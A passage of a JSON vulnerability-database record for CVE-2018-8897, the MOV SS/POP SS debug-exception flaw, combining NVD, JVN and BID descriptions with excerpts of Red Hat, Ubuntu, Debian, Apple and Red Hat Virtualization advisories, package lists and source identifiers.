    "data": "A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer\u0027s Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A; section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL \u003c 3, the debug exception is delivered after the transfer to CPL \u003c 3 is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs. Some operating systems and hypervisors Intel There is a problem that does not expect a debug exception in the hardware architecture, or does not handle it properly. Inappropriate checking or handling for exceptional situations (CWE-703) - CVE-2018-8897 Intel Software Developer Manual (SDM) Vol. SDM Vol 3A section 2.3 According to the debug exception EFLAGS Register IF flag (Interrupt Enable Flag) Is not prohibited. So in certain situations, certain Intel x86-64 Ring level after using architecture-specific instructions 3 Running on OS From component , Higher ring level ( many OS In the ring level 0) Debug exceptions pointing to the data in are enabled. This allows the attacker to API May be used to access sensitive memory information or manipulate high privileged operating system functions.An authenticated attacker could obtain sensitive data in memory and manipulate higher privileged operating system functions. Microsoft Windows is prone to a local privilege-escalation vulnerability. \nAn attacker can exploit this issue to execute arbitrary code with elevated privileges. Intel Architecture (processor architecture) is a CPU specification developed by Intel Corporation for its processor. There are security vulnerabilities in the operating systems of multiple vendors. Systems from the following vendors are affected: Apple; DragonFly BSD Project; FreeBSD Project; Linux Kernel; Microsoft; Red Hat; SUSE Linux; Ubuntu; Vmware; Xen. 7.2) - noarch, x86_64\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2018:1319-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2018:1319\nIssue date:        2018-05-08\nCVE Names:         CVE-2017-7645 CVE-2017-8824 CVE-2017-13166 \n                   CVE-2017-18017 CVE-2017-1000410 CVE-2018-8897 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nSecurity Fix(es):\n\n* hw: cpu: speculative execution permission faults handling (CVE-2017-5754)\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\n* kernel: nfsd: Incorrect handling of long RPC replies (CVE-2017-7645)\n\n* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824)\n\n* kernel: v4l2: disabled memory access protection mechanism allowing\nprivilege escalation (CVE-2017-13166)\n\n* kernel: netfilter: use-after-free in tcpmss_mangle_packet function in\nnet/netfilter/xt_TCPMSS.c (CVE-2017-18017)\n\n* kernel: Stack information leak in the EFS element (CVE-2017-1000410)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nRed Hat would like to thank Google Project Zero for reporting\nCVE-2017-5754; Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for\nreporting CVE-2018-8897; Mohamed Ghannam for reporting CVE-2017-8824; and\nArmis Labs for reporting CVE-2017-1000410. \n\nBug Fix(es):\n\nThese updated kernel packages include also numerous bug fixes. Space\nprecludes documenting all of these bug fixes in this advisory. See the bug\nfix descriptions in the related Knowledge Article:\nhttps://access.redhat.com/articles/3431591\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1443615 - CVE-2017-7645 kernel: nfsd: Incorrect handling of long RPC replies\n1519160 - CVE-2017-1000410 kernel: Stack information leak in the EFS element\n1519591 - CVE-2017-8824 kernel: Use-after-free vulnerability in DCCP socket\n1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling\n1531135 - CVE-2017-18017 kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c\n1548412 - CVE-2017-13166 kernel: v4l2: disabled memory access protection mechanism allowing privilege escalation\n1567074 - CVE-2018-8897 Kernel: error in exception handling leads to DoS\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nkernel-2.6.32-696.28.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nkernel-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-headers-2.6.32-696.28.1.el6.i686.rpm\nperf-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm\nkernel-doc-2.6.32-696.28.1.el6.noarch.rpm\nkernel-firmware-2.6.32-696.28.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-headers-2.6.32-696.28.1.el6.x86_64.rpm\nperf-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nkernel-2.6.32-696.28.1.el6.src.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm\nkernel-doc-2.6.32-696.28.1.el6.noarch.rpm\nkernel-firmware-2.6.32-696.28.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-headers-2.6.32-696.28.1.el6.x86_64.rpm\nperf-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nkernel-2.6.32-696.28.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nkernel-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-headers-2.6.32-696.28.1.el6.i686.rpm\nperf-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm\nkernel-doc-2.6.32-696.28.1.el6.noarch.rpm\nkernel-firmware-2.6.32-696.28.1.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-debug-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-devel-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-headers-2.6.32-696.28.1.el6.ppc64.rpm\nperf-2.6.32-696.28.1.el6.ppc64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-696.28.1.el6.s390x.rpm\nkernel-debug-2.6.32-696.28.1.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.s390x.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-696.28.1.el6.s390x.rpm\nkernel-devel-2.6.32-696.28.1.el6.s390x.rpm\nkernel-headers-2.6.32-696.28.1.el6.s390x.rpm\nkernel-kdump-2.6.32-696.28.1.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-696.28.1.el6.s390x.rpm\nperf-2.6.32-696.28.1.el6.s390x.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-headers-2.6.32-696.28.1.el6.x86_64.rpm\nperf-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\n\nppc64:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-696.28.1.el6.ppc64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\npython-perf-2.6.32-696.28.1.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-696.28.1.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\npython-perf-2.6.32-696.28.1.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nkernel-2.6.32-696.28.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nkernel-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-headers-2.6.32-696.28.1.el6.i686.rpm\nperf-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm\nkernel-doc-2.6.32-696.28.1.el6.noarch.rpm\nkernel-firmware-2.6.32-696.28.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-headers-2.6.32-696.28.1.el6.x86_64.rpm\nperf-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-7645\nhttps://access.redhat.com/security/cve/CVE-2017-8824\nhttps://access.redhat.com/security/cve/CVE-2017-13166\nhttps://access.redhat.com/security/cve/CVE-2017-18017\nhttps://access.redhat.com/security/cve/CVE-2017-1000410\nhttps://access.redhat.com/security/cve/CVE-2018-8897\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/articles/3431591\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFa8fO8XlSAg2UNWIIRAnN0AKCBdjdw1bC12xju0GwoOedA1L8osACaA1Ze\n4IKrbiFeHd+C9bqCjUFX4pw=\n=3psi\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ==========================================================================\nKernel Live Patch Security Notice LSN-0038-1\nMay 8, 2018\n\nlinux vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu:\n\n| Series           | Base kernel  | Arch     | flavors          |\n|------------------+--------------+----------+------------------|\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | generic          |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | lowlatency       |\n| Ubuntu 14.04 LTS | 4.4.0        | amd64    | generic          |\n| Ubuntu 14.04 LTS | 4.4.0        | amd64    | lowlatency       |\n\nSummary:\n\nOn May 8, fixes for CVE-2018-1087 and CVE-2018-8897 were released in linux\nkernel version 4.4.0-124.148. These CVEs are both related to the way that\nthe linux kernel handles certain interrupt and exception instructions. The issue\ncan be triggered by an unprivileged user. \n\nThe fix for this problem requires modification of the interrupt descriptor\ntables (IDT), and modification of the interrupt handlers. Livepatch is \nunable to safely modify these areas, so upgrading to a corrected kernel\nand rebooting is required to fix the problem. \n\nReferences:\nCVE-2018-1087, CVE-2018-8897\n\n-- \nubuntu-security-announce mailing list\nubuntu-security-announce@lists.ubuntu.com\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\n. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n(BZ#1549768)\n\n4. \n\nCVE-2018-10471\n\n    An error was discovered in the mitigations against Meltdown which\n    could result in denial of service. \n\nCVE-2018-10472\n\n    Anthony Perard discovered that incorrect parsing of CDROM images\n    can result in information disclosure. \n\nCVE-2018-10981\n\n    Jan Beulich discovered that malformed device models could result\n    in denial of service. \n\nCVE-2018-10982\n\n    Roger Pau Monne discovered that incorrect handling of high precision\n    event timers could result in denial of service and potentially\n    privilege escalation. \n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 4.8.3+comet2+shim4.10.0+comet3-1+deb9u6. \n\nWe recommend that you upgrade your xen packages. \n\nFor the detailed security status of xen please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/xen\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlr7PHoACgkQEMKTtsN8\nTjbvyBAAqSJFsDcTo75hggE1faIttXR3UKOwJ4eSKbkf3G6/JnvotuO5z4bQXDBC\nXZfkL6kOTl579vmCGgCvBv/SrrPrJ1ibhrw+Dz1MIcjX4Yt9mb6NriWuMTObknca\nuw6qJakWZTB3tFcp3LlmN80B8lY/67XR8mQaZ4f0yHhGEfqIunEtSgLelmp5lLu2\nM/m1iH9zQon3muhQiXiHJeMg1ghJ3xvFKbuEU9prih4NNinxquv0pmAzfbPCCBN6\nE4cuEjArzdnwLydeWfCoLrFOZh5rvoMTmmK8gj2/KVlbC5YgJ5/xVlc89B4PaJKL\nm3oUV2dnLEpubC7uuXSOoejMnfbPcOGM4VYrmuIuxEfZZVNYE/NxvmNCZ+JDzQV7\nZ939vOgyqyuojFFt7lgvoCWM2Q3xDRMrE9akK1KyAGmvyRzoczblw8N6dzL8sain\ngs5LUE/5dCJWQWv4IPz/V/nl50Lh+tYjbdVuZaiXxKYiqiWuCY0Ea+8QIb2UWGrk\nrC2BUYaoYBEo0vQhzBIi91E2hyQ+2Y6+zP6zTVTEA8PDw2YnfdffzydQ3Z9l4OSN\nIoTOojXPpMdcCSVzBC5OkvzBuQ6qzkVh3vftxajYazuiSrPJl8KenLJ6jFlpCzA3\np+140rFiElDCUkHacCmfs4zWQ+/ZLcoAppIxvxDEZYWyRJp3qgU=\n=KAUD\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2018-05-08-1 Additional information for\nAPPLE-SA-2018-04-24-2 Security Update 2018-001\n\nSecurity Update 2018-001 addresses the following:\n\nCrash Reporter\nAvailable for: macOS High Sierra 10.13.4\nImpact: An application may be able to gain elevated privileges\nDescription: A memory corruption issue was addressed with improved\nerror handling. \nCVE-2018-4206: Ian Beer of Google Project Zero\n\nKernel\nAvailable for: macOS High Sierra 10.13.4\nImpact: A malicious application may be able to execute arbitrary\ncode with kernel privileges\nDescription: In some circumstances, some operating systems may not\nexpect or properly handle an Intel architecture debug exception\nafter certain instructions. The issue appears to be from an\nundocumented side effect of the instructions. \nCVE-2018-8897: Andy Lutomirski, Nick Peterson\n(linkedin.com/in/everdox) of Everdox Tech LLC\nEntry added May 8, 2018\n\nLinkPresentation\nAvailable for: macOS High Sierra 10.13.4\nImpact: Processing a maliciously crafted text message may lead to UI\nspoofing\nDescription: A spoofing issue existed in the handling of URLs. This\nissue was addressed with improved input validation. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nIncludes GlusterFS fixes for CVE-2018-1088, dhcp fixes for CVE-2018-1111,\nkernel fixes for CVE-2018-1087, and kernel fixes for CVE-2018-8897. \n\nA list of bugs fixed in this update is available in the Technical Notes\nbook:\nhttps://access.redhat.com/documentation/en-us/red_hat_virtualization/4.2/ht\nml/technical_notes/\n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n1357247 - rhvh 4: reboot after install shows \"4m[terminated]\" and takes long to reboot\n1374007 - [RFE] RHV-H does not default to LVM Thin Provisioning\n1420068 - [RFE] RHV-H should meet NIST 800-53 partitioning requirements by default\n1422676 - [Test Only] Test Ansible playbook for registration\n1429485 - [RFE] Imgbased layers should be named with \u0027%{name}-%{version}-%{release}\u0027 instead of %{name}-%{version}\n1433394 - kdump could fill up /var filesystem while writing to /var/crash\n1443965 - Libvirt is disabled on RHVH host\n1454536 - HostedEngine setup fails if RHV-H timezone \u003c UTC set during installation\n1474268 - RHVH host displays \"upgrade available\" information on the engine after registering until an update is released\n1489567 - Host Software tab does not show exact RHVH version anymore\n1501161 - The version displays as \"4.1\" for subscribed product with RHVH 4.2\n1502920 - File missing after upgrade of RHVH node from version RHVH-4.1-20170925.0 to latest. \n1503148 - [RFE] translate between basic ntp configurations and chrony configurations\n1516123 - tuned-adm timeout while adding the host in manager and the deployment will fail/take time to complete\n1534855 - RHVH brand is missing on cockpit login screen. \n\nBug Fix(es):\n\n* The kernel build requirements have been updated to the GNU Compiler\nCollection (GCC) compiler version that has the support for Retpolines. The\nRetpolines mechanism is a software construct that leverages specific\nknowledge of the underlying hardware to mitigate the branch target\ninjection, also known as Spectre variant 2 vulnerability described in\nCVE-2017-5715. (BZ#1554253)\n\n4. 6.5) - x86_64\n\n3. (BZ#1554256)\n\n4",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-8897"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003031"
      },
      {
        "db": "BID",
        "id": "104071"
      },
      {
        "db": "VULHUB",
        "id": "VHN-138929"
      },
      {
        "db": "PACKETSTORM",
        "id": "147550"
      },
      {
        "db": "PACKETSTORM",
        "id": "147540"
      },
      {
        "db": "PACKETSTORM",
        "id": "147535"
      },
      {
        "db": "PACKETSTORM",
        "id": "147552"
      },
      {
        "db": "PACKETSTORM",
        "id": "147545"
      },
      {
        "db": "PACKETSTORM",
        "id": "147548"
      },
      {
        "db": "PACKETSTORM",
        "id": "147651"
      },
      {
        "db": "PACKETSTORM",
        "id": "147533"
      },
      {
        "db": "PACKETSTORM",
        "id": "147646"
      },
      {
        "db": "PACKETSTORM",
        "id": "147539"
      },
      {
        "db": "PACKETSTORM",
        "id": "147542"
      }
    ],
    "trust": 2.97
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-138929",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-138929"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-8897",
        "trust": 3.3
      },
      {
        "db": "CERT/CC",
        "id": "VU#631579",
        "trust": 2.2
      },
      {
        "db": "BID",
        "id": "104071",
        "trust": 1.4
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2018/05/08/4",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2018/05/08/1",
        "trust": 1.1
      },
